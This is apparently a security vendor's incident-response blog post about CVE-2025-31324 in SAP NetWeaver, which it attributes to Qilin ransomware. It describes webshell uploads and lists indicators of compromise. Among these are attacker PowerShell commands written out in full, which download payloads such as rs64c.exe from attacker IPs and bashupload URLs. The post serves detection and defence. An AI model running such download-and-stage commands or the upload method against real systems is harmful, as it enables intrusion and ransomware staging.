Open Nav
Sign Up

SAP Zero – Frostbite: How Russian RaaS Actor Qilin Exploited CVE-2025-31324 Weeks Before its Public Disclosure

CVE-2025-31324

Matan Matalon

May 15, 2025

CVE-2025-31324 hit the security world like a tsunami – an easily exploitable SAP vulnerability affecting enterprise environments across the globe. But while most assumed its exploitation began post-disclosure, new evidence suggests otherwise.

During an incident response led by OP Innovate for a major global enterprise, we uncovered proof that this vulnerability was actively exploited nearly three weeks before it was made public. While recent articles point the finger towards China-Linked APTs, we identified communication with known Cobalt Strike C2 infrastructure and IP addresses linked directly to Qilin, a notorious Russian-speaking Ransomware-as-a-Service group.

What started as a routine post-disclosure investigation quickly evolved into a rare glimpse of zero-day exploitation in the wild – and possibly, early access to a vulnerability that hadn’t yet made headlines.

In this blog, we’ll walk you through:

  • How the attack unfolded weeks before disclosure
  • What we found during forensic analysis
  • Why we believe this ties into broader Qilin ransomware operations
  • What defenders can learn from this breach to prepare for future threats exploiting enterprise middleware like SAP
  • What organizations using SAP should do to stay safe

CVE-2025-31324: Simple Exploit, Serious Impact

CVE-2025-31324 is a critical vulnerability affecting SAP NetWeaver Visual Composer, a component commonly deployed in large enterprise environments. The flaw lies in the /developmentserver/metadatauploader endpoint, which fails to properly enforce authentication and authorization. This allows an unauthenticated attacker to upload arbitrary files, including web shells, to the server, with ease.

SAP assigned this a CVSS score of 10.0, reflecting its trivial exploitation path and severe impact, including the potential for remote code execution and full system compromise.

What makes this vulnerability especially dangerous is its accessibility:

  • No authentication required
  • Attack surface exposed via standard HTTP(S)
  • Commonly deployed in enterprise SAP environments

By the time SAP released an emergency patch and CISA added it to the KEV catalog, exploitation was underway – and, as we discovered, not just after the disclosure.

As a byproduct of the incident response, OP Innovate developed and deployed a dedicated WASP scanner to detect insecure deserialization vulnerabilities like CVE-2025-31324. This scanner is currently operational and actively scanning for affected SAP NetWeaver components.

Inside the Breach: From Minus-One to Zero 

OP Innovate’s investigation revealed two separate exploitations of CVE-2025-31324 within a major enterprise environment. The first occurred nearly three weeks before the vulnerability was publicly disclosed. The second happened shortly after the CVE was published. Although both incidents relied on the same unauthenticated file upload flaw in SAP NetWeaver, the threat infrastructure and observed behavior varied significantly. 

During the investigation, our team identified a publicly available Proof of Concept (POC) exploit for CVE-2025-31324 hosted on GitHub. The POC specifically targeted the vulnerable /developmentserver/metadatauploader endpoint and demonstrated how to upload arbitrary .jsp files, without authentication. This code closely matched the method used in the attack, helping us validate the exploitation chain and confirm that the threat actor leveraged this exact vulnerability in the wild.

Pre-Disclosure Exploitation

Initial Access:
Weeks before CVE-2025-31324 appeared in public advisories, an attacker exploited the vulnerable Metadata Uploader endpoint within SAP NetWeaver. The most probable access vector was a misconfigured load balancer that exposed internal services to the internet.

The attacker uploaded several JSP-based webshells to the SAP IRJ directory:

\usr\sap\PP1\J01\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root\

Webshells like random12.jsp, xxkmszdm.jsp, and gpfmddkh.jsp were automatically compiled and enabled full remote code execution.

Once in, the attacker attempted to:

  • Initiate outbound communication with Cobalt Strike C2 infrastructure (180[.]131[.]145[.]73, 184[.]174[.]96[.]74)
  • Download and stage a payload (rs64c.exe) from http[:]//184[.]174[.]96[.]74/rs64c.exe, a reverse SOCKS5 tunneling tool
  • Save the payload locally as svchost.exe and prepare for execution

What We Saw:
The attacker’s use of IP address 184[.]174[.]96[.]74 and the tool rs64c.exe closely matches infrastructure and tools previously associated with Qilin, a Russian-speaking Ransomware-as-a-Service (RaaS) group. This indicates the activity was likely part of an initial access attempt, potentially intended to prepare the ground for a future ransomware attack or to sell access to other threat actors.

What Failed:

  • The Firewall blocked outbound C2 traffic
  • The EDR quarantined all downloaded payloads
  • Neither lateral movement nor persistence mechanisms were observed
  • The attacker attempted to clean up artifacts by issuing Remove-Item commands for files like random12.jsp and ESC.exe, but the files had already been quarantined by EDR, rendering the cleanup ineffective.

Post-Disclosure Exploitation

Initial Access:
Shortly after CVE-2025-31324 was disclosed publicly, a second exploitation attempt was observed. The attacker again leveraged the same SAP endpoint to upload webshells. However, there is no evidence linking this activity to the pre-disclosure attacker, as no overlapping infrastructure or tools were observed.

What the Attacker Did:
New webshells – such as ran_new.jsp, bdtzvjzm.jsp, and decoxfiv.jsp – were deployed, followed by attempts to download executables via PowerShell:

  • https://bashupload.com/bSLrt/test.exe → temp.exe
  • https://bashupload.com/HUbaF/test.exe → temp_new.exe

What Failed:

  • All download attempts were blocked or quarantined
  • No execution, lateral movement, nor communication with external infrastructure occurred
  • Deployed files were manually removed, likely by the attacker

Outcome

In both incidents, the attacker successfully gained initial access and remote code execution by exploiting CVE-2025-31324. However, post-exploitation efforts failed completely in both cases:

  • No payloads were executed
  • No data was exfiltrated
  • No movement beyond the SAP servers occurred

Defensive controls – including network-layer blocking and endpoint containment – prevented what may have been a planned ransomware delivery. The pre-disclosure incident bore the hallmarks of Qilin-linked infrastructure, while the post-disclosure event remains unattributed but similarly neutralized.

The Qilin Connection: Exploiting SAP, Staging for Ransomware

The pre-disclosure activity observed in this incident shows clear overlap with tactics and infrastructure linked to Qilin, a Russian-speaking Ransomware-as-a-Service (RaaS) group active since 2022. Qilin operates through an affiliate model, frequently leveraging Initial Access Brokers (IABs), commodity tooling, and staged infrastructure to prepare environments for high-impact ransomware deployment.

Qilin’s Tactics

According to public threat intelligence from multiple sources, Qilin affiliates typically follow a consistent operational pattern:

  • Initial access via exposed web applications or phishing
  • Deployment of tunneling utilities or frameworks like Cobalt Strike
  • Network scoping, privilege escalation, and lateral movement
  • Delayed ransomware deployment and data extortion

This incident mirrors several elements of that playbook – including unauthenticated access via a known (or yet to be known) CVE, staging of remote access tools, and outbound communication with known infrastructure.

Supporting Evidence from Official Intelligence

Prior to public awareness of this specific intrusion, Indonesia’s National Cyber and Crypto Agency (BSSN) published an official IOC bulletin – IOC_QILIN Ransomware v1.3, dated April 15, 2025 – listing infrastructure indicators linked to Qilin ransomware activity. This bulletin included:

  • IP address: 184[.]174[.]96[.]70
  • File path: C:\ProgramData\rs64c.exe
  • IP address: 180[.]131[.]145[.]73

Each of these indicators corresponds closely with evidence from this incident:

  • The attacker downloaded the tunneling tool rs64c.exe from http[:]//184[.]174[.]96[.]74/rs64c.exe — an IP in the same 184[.]174[.]96[.]0/24 subnet as the Qilin-linked IP 184[.]174[.]96[.]70
  • The binary was written to the exact same path listed in the bulletin: C:\ProgramData\rs64c.exe
  • The attacker attempted to reach 180[.]131[.]145[.]73, which is explicitly listed in the BSSN bulletin as Qilin infrastructure

These direct overlaps – including exact file paths and IP matches – support a high-confidence assessment that the infrastructure leveraged in this incident aligns with known Qilin operations.

Use of Cobalt Strike

Cobalt Strike remains a standard tool in post-exploitation phases of many RaaS operations, including Qilin. Its modular, red-team-oriented architecture makes it ideal for maintaining persistence, conducting reconnaissance, and staging ransomware payloads. While beacon sessions were blocked in this case, the attacker’s preparation and infrastructure use were consistent with a pre-ransomware staging phase typical of Qilin affiliates.

Recommendations

Based on the observed tactics and mitigated actions during the incident, the following recommendations are aimed at reducing exposure to similar threat activity and improving organizational resilience against exploitation and ransomware staging:

  1. Patch and Restrict Exposure of SAP NetWeaver Systems
  • Immediately apply the vendor patch addressing CVE-2025-31324 on all affected SAP NetWeaver instances.
  • Implement strict network segmentation to ensure SAP interfaces are not publicly accessible unless absolutely necessary.
  • Review reverse proxy/load balancer configurations (e.g., F5) to avoid accidental exposure of internal endpoints.
  1. Web Application Hardening
  • Enable web application firewalls (WAFs) or filtering controls that block unauthorized file uploads and exploit attempts.
  • Regularly audit for the presence of custom endpoints (like /metadatauploader) that may bypass authentication or input validation.
  1. Endpoint and Malware Defense
  • Maintain EDR coverage on all internet-facing and business-critical systems. Ensure automatic quarantine is enabled and up-to-date detection signatures are deployed.
  • Block execution from temporary paths such as C:\ProgramData\ and other commonly abused directories via group policy or EDR rules.
  • Prevent execution of unsigned or suspicious binaries downloaded via PowerShell or other scripting interfaces.
  1. Network Controls and C2 Disruption
  • Enforce egress filtering on firewall and proxy layers to block outbound connections to untrusted IPs and domains.
  • Block traffic to known Cobalt Strike and reverse proxy tools (e.g., rs64c.exe) using threat intelligence feeds (e.g., ThreatFox, AbuseIPDB).
  • Monitor for unusual outbound communication to rare external IPs, particularly from servers not expected to initiate such traffic.
  1. PowerShell Monitoring and Restrictions
  • Enable PowerShell Script Block Logging and Constrained Language Mode on servers.
  • Alert on suspicious PowerShell activity, especially:
    • Invoke-WebRequest or wget
    • Downloading to uncommon paths
    • Use of Remove-Item for cleanup
  1. Incident Readiness and Response
  • Review and test incident response plans, especially for pre-ransomware detection.
  • Ensure your SOC and IR teams are trained to identify early-stage intrusion activity, even before payload delivery (e.g., C2 staging, tunneling tools).
  • Establish a process to cross-reference alerts with public IOCs, such as those shared in bulletins like BSSN IOC_QILIN v1.3.
  1. Threat Intelligence Integration
  • Subscribe to and regularly review government and vendor-published IOC feeds.
  • Integrate IOC correlation into SIEM and SOAR workflows, ensuring real-time blocking or escalation on high-fidelity matches.

Unique Indicators of Compromise (IOCs)

IOC TypeIOCHash typeDescriptionNotes
File HashD1C43F8DB230BDF18C61D672440EBA12MD5Old executable
test.exe
Downloaded to: C:\ProgramData\temp.exe

Download URL: https://bashupload.com/bSLrt/test.exe
File Hash6914B1F5B6843341FAFDFAA9D57818B9MD5New executable
test.exe (same filename, different hash and URL)
Downloaded to: C:\ProgramData\temp_new.exe
Download URL: https://bashupload.com/HUbaF/test.exe
IP Addresshttp[:]//184[.]174[.]96[.]70Known Qilin IOC; used as command-and-control or payload host.
IP Addresshttp[:]//184[.]174[.]96[.]74Staging IP used to host rs64c.exe reverse tunneler.
IP Address180[.]131[.]145[.]73Command-and-control IP associated with Qilin; pinged from target system.
URLhttp[:]//184[.]174[.]96[.]70/rs64c.exeDownload URL for reverse SOCKS5 tunneler (IOC-listed host).
URLhttp[:]//184[.]174[.]96[.]74/rs64c.exeDownload URL for reverse SOCKS5 tunneler (IOC-listed host).
Command Linepowershell.exe /c invoke-webrequest http://184.174.96.74/rs64c.exe -OutFile c:\programdata\svchost.exePowerShell command used to download rs64c.exe to a writable directory.
Command Linepowershell Invoke-WebRequest -Uri https://bashupload.com/bSLrt/test.exe -OutFile C:\ProgramData\temp.exeCommand used to download a malicious executable via Bashupload service.
Command LinePowerShell Remove-ItemCleanup command to remove dropped files such as ESC.exe and random12.jsp.Used to delete ESC.exe and random12.jsp
Path“\usr\sap\PP1\J01\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root\”SAP webroot path used by attacker to upload malicious JSP files.Used for uploading malicious JSP files
Directory\Device\HarddiskVolume12\usr\sap\PP1\J01\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work\
Directory where JSPs were auto-compiled to .class files — evidence of exploitation.SAP class file pathLocation where JSP files were compiled to .class – Prove exploitation by creating classes
File Namesrandom12.jsp, duchyofn.jsp, rbekqaun.jsp, rwlrqhrj.jsp, xxkmszdm.jsp, gpfmddkh.jsp, bdtzvjzm.jsp, decoxfiv.jsp, zdulvrqu.jsp, ran_new.jsp
Automatically compiled by the SAP server, generating corresponding .class files inside the \irj\work\ folderRandom 8-char names for stealth.Randomized JSP WebshellUploaded to SAP root path
File Names“JEE_jsp_bdtzvjzm_1743883325986.class”Auto-compiled JSP class file resulting from uploaded webshell.
File Names“test.exe”Malicious executable downloaded from Bashupload and staged in ProgramData.Dropped in SAP root path
File Names“ESC.exe”Malicious binary dropped via webshell, later deleted via PowerShell.Dropped in SAP root path

Protect Your Systems with OP Innovate

As cyber threats grow more sophisticated, organizations need trusted partners who can deliver both proactive defense and rapid response. OP Innovate helps businesses stay secure by combining immediate incident response services with advanced vulnerability detection.

Our dedicated WASP scanner continuously monitors SAP environments for critical weaknesses like insecure deserialization flaws, including CVE-2025-31324, helping organizations fix issues before attackers can exploit them. In parallel, our Incident Response (IR) teams are ready to rapidly contain and investigate any breach, minimizing disruption and restoring security.

We share regular threat intelligence updates and security insights. Sign up to receive our latest updates straight to your inbox:

Resources highlights

Our Red Team’s Favorite Penetration Testing Tools in 2025 (And How We Use Them)

When it comes to red team operations, the tools you choose can make or break the engagement. From initial reconnaissance to post-exploitation, having a streamlined,…

Read more >

pentesting tools - op

New Linux Vulnerabilities (CVE-2025-6018 & CVE-2025-6019) Enable Full Root Access in Seconds

Security researchers have uncovered a critical privilege escalation chain in major Linux distributions that allows any local user with a session (SSH or GUI) to…

Read more >

CVE-2025-6018, CVE-2025-6019

Zero to Hero: How Our Red Team Turned a Sticky Note Into Full Cloud Compromise

“The weakest link in your security chain might be sitting right on your desk.” At OP Innovate, our CREST-certified red team is trained to think…

Read more >

OP Innovate Red Team

One-Third of All Grafana Instances Vulnerable to XSS (CVE-2025-4123)

Over 46,000 internet-facing Grafana servers (≈36 % of those online) are still running versions susceptible to CVE-2025-4123, a high-severity open-redirect that chains into stored cross-site…

Read more >

CVE-2025-4123

New Microsoft Outlook Vulnerability Enables Local Code Execution (CVE-2025-47176)

Published: June 11, 2025 Threat Level: High Affected Product: Microsoft Outlook (Microsoft 365 Apps for Enterprise, Office LTSC 2024) CVSS Score: 7.8 (High) A newly…

Read more >

CVE-2025-47176

How MSSPs Are Turning Penetration Testing Into Recurring Revenue with WASP

When OP Innovate first launched WASP in 2022, we weren’t chasing unicorn status or massive VC rounds. We were focused on fixing a real problem:…

Read more >

Under Cyber Attack?

Fill out the form and we will contact you immediately.